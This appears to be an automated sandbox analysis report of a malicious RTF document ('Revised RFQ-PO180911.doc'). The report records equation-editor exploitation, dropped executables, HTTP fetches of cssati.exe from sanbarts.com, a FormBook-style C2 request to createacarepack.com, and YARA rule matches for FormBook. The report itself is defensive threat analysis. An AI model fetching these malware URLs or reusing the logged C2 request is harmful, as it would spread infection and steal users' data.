          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/33
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914970619.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sanbarts.com/cssati.exej
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.971345322.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.958260640.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.958544011.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.963238551.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.939397773.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1025977451.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.953687008.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.965173113.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.941729011.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/Couri
          Source: EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/YR$
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exe
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exeC:
          Source: EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sanbarts.com/cssati.exekkC:
          Source: explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: wuapp.exe, 00000008.00000002.1182990879.000000000293F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6C29C56C-3D5B-4878-9A01-77B8177CDD57}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: sanbarts.com
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sanbarts.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cssati.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.sanbarts.com
          Source: global trafficHTTP traffic detected: GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1Host: www.createacarepack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404FDD

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Initial sample is an obfuscated RTF file
          Source: initial sampleStatic file information: Filename: Revised RFQ-PO180911.doc
          Malicious sample detected (through community Yara rule)
          Source: Revised RFQ-PO180911.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exeJump to dropped file
          Source: Revised RFQ-PO180911.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004032FA EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004032FA
